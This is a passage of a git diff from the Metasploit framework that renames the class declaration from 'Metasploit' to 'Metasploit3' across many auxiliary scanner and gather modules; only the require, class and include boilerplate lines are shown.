Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/gather/xbmc_traversal.rb b/modules/auxiliary/gather/xbmc_traversal.rb index 7212e4cdcb..20191221bd 100644 --- a/modules/auxiliary/gather/xbmc_traversal.rb +++ b/modules/auxiliary/gather/xbmc_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/xerox_pwd_extract.rb b/modules/auxiliary/gather/xerox_pwd_extract.rb index 7b4f0c11af..36920371f8 100644 --- a/modules/auxiliary/gather/xerox_pwd_extract.rb +++ b/modules/auxiliary/gather/xerox_pwd_extract.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb b/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb index 6ed0903d37..acf8953766 100644 --- a/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb +++ b/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/parser/unattend.rb b/modules/auxiliary/parser/unattend.rb index 41d69a46af..7ad4e310cd 100644 --- a/modules/auxiliary/parser/unattend.rb +++ b/modules/auxiliary/parser/unattend.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/parser/unattend' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary def initialize(info={}) super( update_info( info, diff --git a/modules/auxiliary/pdf/foxit/authbypass.rb b/modules/auxiliary/pdf/foxit/authbypass.rb index 70dab66ac7..438a3ecaee 100644 --- a/modules/auxiliary/pdf/foxit/authbypass.rb +++ b/modules/auxiliary/pdf/foxit/authbypass.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::FILEFORMAT diff --git a/modules/auxiliary/scanner/acpp/login.rb b/modules/auxiliary/scanner/acpp/login.rb index fa8511ead3..10047d1b06 100644 --- a/modules/auxiliary/scanner/acpp/login.rb +++ b/modules/auxiliary/scanner/acpp/login.rb @@ -8,7 +8,7 @@ require 'rex/proto/acpp' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/acpp' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/afp/afp_login.rb b/modules/auxiliary/scanner/afp/afp_login.rb index 4d25ec841c..74aa22c26a 100644 --- a/modules/auxiliary/scanner/afp/afp_login.rb +++ b/modules/auxiliary/scanner/afp/afp_login.rb @@ -8,7 +8,7 @@ require 'openssl' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/afp' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/afp/afp_server_info.rb b/modules/auxiliary/scanner/afp/afp_server_info.rb index b1f17be410..5a7c4edc0c 100644 --- a/modules/auxiliary/scanner/afp/afp_server_info.rb +++ b/modules/auxiliary/scanner/afp/afp_server_info.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb b/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb index 9cb706487d..d48bc8a561 100644 --- a/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb +++ b/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/chargen/chargen_probe.rb b/modules/auxiliary/scanner/chargen/chargen_probe.rb index 92202650d6..fe43a0e3e5 100644 --- a/modules/auxiliary/scanner/chargen/chargen_probe.rb +++ b/modules/auxiliary/scanner/chargen/chargen_probe.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Capture diff --git a/modules/auxiliary/scanner/couchdb/couchdb_enum.rb b/modules/auxiliary/scanner/couchdb/couchdb_enum.rb index c69dd6fe78..d7242a5e71 100644 --- a/modules/auxiliary/scanner/couchdb/couchdb_enum.rb +++ b/modules/auxiliary/scanner/couchdb/couchdb_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/couchdb/couchdb_login.rb b/modules/auxiliary/scanner/couchdb/couchdb_login.rb index a3810b23a8..5782874ac1 100644 --- a/modules/auxiliary/scanner/couchdb/couchdb_login.rb +++ b/modules/auxiliary/scanner/couchdb/couchdb_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/db2/db2_auth.rb b/modules/auxiliary/scanner/db2/db2_auth.rb index dfe7e30b87..b5afbe1bab 100644 --- a/modules/auxiliary/scanner/db2/db2_auth.rb +++ b/modules/auxiliary/scanner/db2/db2_auth.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/db2' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::DB2 include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/db2/db2_version.rb b/modules/auxiliary/scanner/db2/db2_version.rb index 9c09a78c49..3feac07d07 100644 --- a/modules/auxiliary/scanner/db2/db2_version.rb +++ b/modules/auxiliary/scanner/db2/db2_version.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::DB2 include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/db2/discovery.rb b/modules/auxiliary/scanner/db2/discovery.rb index bbf372ffa0..3b6aea526d 100644 --- a/modules/auxiliary/scanner/db2/discovery.rb +++ b/modules/auxiliary/scanner/db2/discovery.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb b/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb index ea5d33eb4a..f99da3d29f 100644 --- a/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb +++ b/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/scanner/dcerpc/hidden.rb b/modules/auxiliary/scanner/dcerpc/hidden.rb index 2be6d73570..79c2b359f7 100644 --- a/modules/auxiliary/scanner/dcerpc/hidden.rb +++ b/modules/auxiliary/scanner/dcerpc/hidden.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/scanner/dcerpc/management.rb b/modules/auxiliary/scanner/dcerpc/management.rb index 3e268a983a..753450426a 100644 --- a/modules/auxiliary/scanner/dcerpc/management.rb +++ b/modules/auxiliary/scanner/dcerpc/management.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb b/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb index 254dc2e3a8..2641054b1f 100644 --- a/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb +++ b/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb b/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb index fb871424c7..d8f2d437cb 100644 --- a/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb +++ b/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb @@ -8,7 +8,7 @@ require 'rex/proto/dcerpc' require 'rex/proto/dcerpc/wdscp' require 'rex/parser/unattend' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/dect/call_scanner.rb b/modules/auxiliary/scanner/dect/call_scanner.rb index f519f20e41..12c88f72f6 100644 --- a/modules/auxiliary/scanner/dect/call_scanner.rb +++ b/modules/auxiliary/scanner/dect/call_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::DECT_COA diff --git a/modules/auxiliary/scanner/dect/station_scanner.rb b/modules/auxiliary/scanner/dect/station_scanner.rb index 64a0b9743d..cd1bf10cc4 100644 --- a/modules/auxiliary/scanner/dect/station_scanner.rb +++ b/modules/auxiliary/scanner/dect/station_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::DECT_COA diff --git a/modules/auxiliary/scanner/discovery/arp_sweep.rb b/modules/auxiliary/scanner/discovery/arp_sweep.rb index 34510cee99..50df7747c8 100644 --- a/modules/auxiliary/scanner/discovery/arp_sweep.rb +++ b/modules/auxiliary/scanner/discovery/arp_sweep.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Capture include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/discovery/empty_udp.rb b/modules/auxiliary/scanner/discovery/empty_udp.rb index 5a98e0a34c..d64ec3ebd8 100644 --- a/modules/auxiliary/scanner/discovery/empty_udp.rb +++ b/modules/auxiliary/scanner/discovery/empty_udp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb index af115ccdef..4795a21ae8 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Capture include Msf::Exploit::Remote::Ipv6 diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb index b770a25ba4..c60d28db3a 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ipv6 include Msf::Exploit::Remote::Capture diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb index d3e31a79e0..08e6967dfe 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Capture include Msf::Exploit::Remote::Ipv6 diff --git a/modules/auxiliary/scanner/discovery/udp_probe.rb b/modules/auxiliary/scanner/discovery/udp_probe.rb index 8ec57575b6..152f3c7374 100644 --- a/modules/auxiliary/scanner/discovery/udp_probe.rb +++ b/modules/auxiliary/scanner/discovery/udp_probe.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'openssl' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/discovery/udp_sweep.rb b/modules/auxiliary/scanner/discovery/udp_sweep.rb index b765c51970..e8222d1e05 100644 --- a/modules/auxiliary/scanner/discovery/udp_sweep.rb +++ b/modules/auxiliary/scanner/discovery/udp_sweep.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'openssl' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb b/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb index e84a0faf88..21e6d9ffb1 100644 --- a/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb +++ b/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'socket' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/dns/dns_amp.rb b/modules/auxiliary/scanner/dns/dns_amp.rb index ce03ad0354..4b448dca11 100644 --- a/modules/auxiliary/scanner/dns/dns_amp.rb +++ b/modules/auxiliary/scanner/dns/dns_amp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Capture diff --git a/modules/auxiliary/scanner/elasticsearch/indices_enum.rb b/modules/auxiliary/scanner/elasticsearch/indices_enum.rb index 64b7e88327..0fc0fd14c0 100644 --- a/modules/auxiliary/scanner/elasticsearch/indices_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/indices_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb b/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb index 1e88173ba5..98234fe2f9 100644 --- a/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb +++ b/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb b/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb index 4175296a75..57e3e108e0 100644 --- a/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb +++ b/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/finger/finger_users.rb b/modules/auxiliary/scanner/finger/finger_users.rb index 4c091646e8..e95315b367 100644 --- a/modules/auxiliary/scanner/finger/finger_users.rb +++ b/modules/auxiliary/scanner/finger/finger_users.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ftp/anonymous.rb b/modules/auxiliary/scanner/ftp/anonymous.rb index 9766426068..8af1e9cf16 100644 --- a/modules/auxiliary/scanner/ftp/anonymous.rb +++ b/modules/auxiliary/scanner/ftp/anonymous.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb b/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb index 8724683890..4970ab3c62 100644 --- a/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb +++ b/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ftp/ftp_login.rb b/modules/auxiliary/scanner/ftp/ftp_login.rb index 3965fc0af5..676ea23753 100644 --- a/modules/auxiliary/scanner/ftp/ftp_login.rb +++ b/modules/auxiliary/scanner/ftp/ftp_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/ftp' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ftp/ftp_version.rb b/modules/auxiliary/scanner/ftp/ftp_version.rb index e6dcb783d8..e922b36249 100644 --- a/modules/auxiliary/scanner/ftp/ftp_version.rb +++ b/modules/auxiliary/scanner/ftp/ftp_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb b/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb index b13ef51247..deceef291b 100644 --- a/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb +++ b/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb b/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb index dd9ea3ccd6..bcdb39565b 100644 --- a/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb +++ b/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb index a55c362319..c29b0bb930 100644 --- a/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb +++ b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/h323/h323_version.rb b/modules/auxiliary/scanner/h323/h323_version.rb index e701c23729..56008ba45a 100644 --- a/modules/auxiliary/scanner/h323/h323_version.rb +++ b/modules/auxiliary/scanner/h323/h323_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb b/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb index 3cc87aa5ce..82e6fbb881 100644 --- a/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb b/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb index 405061855c..bb63c2a7d3 100644 --- a/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb +++ b/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/adobe_xml_inject.rb b/modules/auxiliary/scanner/http/adobe_xml_inject.rb index aec45503bc..e801a16c18 100644 --- a/modules/auxiliary/scanner/http/adobe_xml_inject.rb +++ b/modules/auxiliary/scanner/http/adobe_xml_inject.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb b/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb index 586e872408..b5d88ff665 100644 --- a/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb +++ b/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/apache_activemq_traversal.rb b/modules/auxiliary/scanner/http/apache_activemq_traversal.rb index b445e5c823..fff6aa5d95 100644 --- a/modules/auxiliary/scanner/http/apache_activemq_traversal.rb +++ b/modules/auxiliary/scanner/http/apache_activemq_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/apache_userdir_enum.rb b/modules/auxiliary/scanner/http/apache_userdir_enum.rb index 427922568c..483f7acb5d 100644 --- a/modules/auxiliary/scanner/http/apache_userdir_enum.rb +++ b/modules/auxiliary/scanner/http/apache_userdir_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/appletv_login.rb b/modules/auxiliary/scanner/http/appletv_login.rb index 739f6e4d67..d2c30f1bf1 100644 --- a/modules/auxiliary/scanner/http/appletv_login.rb +++ b/modules/auxiliary/scanner/http/appletv_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/http' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/axis_local_file_include.rb b/modules/auxiliary/scanner/http/axis_local_file_include.rb index 1e17cec220..c4c029987c 100644 --- a/modules/auxiliary/scanner/http/axis_local_file_include.rb +++ b/modules/auxiliary/scanner/http/axis_local_file_include.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/axis_login.rb b/modules/auxiliary/scanner/http/axis_login.rb index 8c68f87208..c806a5df43 100644 --- a/modules/auxiliary/scanner/http/axis_login.rb +++ b/modules/auxiliary/scanner/http/axis_login.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/axis2' require 'metasploit/framework/credential_collection' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/backup_file.rb b/modules/auxiliary/scanner/http/backup_file.rb index addd523cbe..3ac0d740bb 100644 --- a/modules/auxiliary/scanner/http/backup_file.rb +++ b/modules/auxiliary/scanner/http/backup_file.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanFile diff --git a/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb b/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb index ddab23fc94..af42fa9fa9 100644 --- a/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb b/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb index 74d4053934..dbaf72cd7e 100644 --- a/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb +++ b/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/blind_sql_query.rb b/modules/auxiliary/scanner/http/blind_sql_query.rb index a8ea76d283..4903073c2a 100644 --- a/modules/auxiliary/scanner/http/blind_sql_query.rb +++ b/modules/auxiliary/scanner/http/blind_sql_query.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanUniqueQuery diff --git a/modules/auxiliary/scanner/http/brute_dirs.rb b/modules/auxiliary/scanner/http/brute_dirs.rb index eaadfebfb9..5ffdf2bbdf 100644 --- a/modules/auxiliary/scanner/http/brute_dirs.rb +++ b/modules/auxiliary/scanner/http/brute_dirs.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'enumerable' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/buffalo_login.rb b/modules/auxiliary/scanner/http/buffalo_login.rb index 3d0bdddabe..26d643853f 100644 --- a/modules/auxiliary/scanner/http/buffalo_login.rb +++ b/modules/auxiliary/scanner/http/buffalo_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/buffalo' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/canon_wireless.rb b/modules/auxiliary/scanner/http/canon_wireless.rb index 3cfb3753e8..b9e1cdbf7b 100644 --- a/modules/auxiliary/scanner/http/canon_wireless.rb +++ b/modules/auxiliary/scanner/http/canon_wireless.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/cert.rb b/modules/auxiliary/scanner/http/cert.rb index 46a7c80fbc..167bb24fc9 100644 --- a/modules/auxiliary/scanner/http/cert.rb +++ b/modules/auxiliary/scanner/http/cert.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::WmapScanSSL diff --git a/modules/auxiliary/scanner/http/chef_webui_login.rb b/modules/auxiliary/scanner/http/chef_webui_login.rb index 53eb090887..e8abdfe8f7 100644 --- a/modules/auxiliary/scanner/http/chef_webui_login.rb +++ b/modules/auxiliary/scanner/http/chef_webui_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/chef_webui' require 'metasploit/framework/credential_collection' -class Metasploit 